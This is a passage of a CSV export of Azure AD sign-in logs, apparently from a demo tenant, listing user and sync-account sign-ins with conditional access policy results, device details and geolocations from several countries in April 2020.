'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:59,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",11a868c6-5405-4103-99d2-d5c4f6a10700,,,"{'countryOrRegion': 'KH', 'geoCoordinates': {'longitude': 105, 'latitude': 13}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,11a868c6-5405-4103-99d2-d5c4f6a10700,SigninLogs,Sucess,13,105
+1598,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:22.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,cad86ba2-98e7-46b9-80b3-e3d53f244420,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,DZ,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:56,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",85789f99-3a4c-45a5-91bc-019481ac0700,,,"{'countryOrRegion': 'DZ', 'geoCoordinates': {'longitude': 3, 'latitude': 28}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,85789f99-3a4c-45a5-91bc-019481ac0700,SigninLogs,Sucess,28,3
+1599,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:49.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4b375b9c-e707-4246-a4ed-f9a01ac4d625,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",22fd8c7c-75eb-4549-80fa-1727fc510700,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,22fd8c7c-75eb-4549-80fa-1727fc510700,SigninLogs,Sucess,-20.54751015,-47.4056282
+1600,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:34.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8ad3cd38-fa26-46a1-b2b4-70651836398a,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",67310a2e-a313-4902-99ba-eeb27ece0600,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,67310a2e-a313-4902-99ba-eeb27ece0600,SigninLogs,Sucess,-20.54751015,-47.4056282
+1601,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:54.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6a458475-1b46-4605-a400-c7a920460895,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Office Delve,94c63fef-13a3-47bc-8074-75af8c65887a,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 32, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 08:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",368167e5-753b-476f-b20c-ef0278bf0500,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,368167e5-753b-476f-b20c-ef0278bf0500,SigninLogs,Sucess,-20.54751015,-47.4056282
+1602,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:16.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,eb8f781f-c56e-42db-aeba-fdc20eacd4b1,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 12:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",d6103972-d51f-4bff-802b-f4401a4e1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,d6103972-d51f-4bff-802b-f4401a4e1200,SigninLogs,Sucess,36.6404686,-78.26995087
+1603,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:22.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d6bf911a-14b2-4053-b250-0af0d2433aef,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 12:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",c3a23e25-0820-4eee-81ce-29ebf9781200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,c3a23e25-0820-4eee-81ce-29ebf9781200,SigninLogs,Sucess,36.6404686,-78.26995087
+1604,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:57.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a1165b22-be1d-4e78-8b8a-73a0d8bbff2b,Microsoft.aadiam,Microsoft.aadiam,,Ashish Kapila,4,GB,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:28,"{'operatingSystem': 'Windows 10', 'deviceId': 'a8835158-f705-4014-a58f-5a04beb76aba', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-15OQVR5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",958e0a6d-6c83-41e5-8796-157f42a61100,,,"{'countryOrRegion': 'GB', 'geoCoordinates': {'longitude': -0.9697200059890749, 'latitude': 51.445831298828125}, 'state': 'Reading', 'city': 'Reading'}",none,none,none,none,[],{'errorCode': 0},Ashish Kapila,61c20c19-6e81-4684-affc-fdb7086bb546,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,958e0a6d-6c83-41e5-8796-157f42a61100,SigninLogs,Sucess,51.4458313,-0.969720006
+1605,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:16.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,230df9cf-1375-4a13-b823-03cc092c8cc4,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': 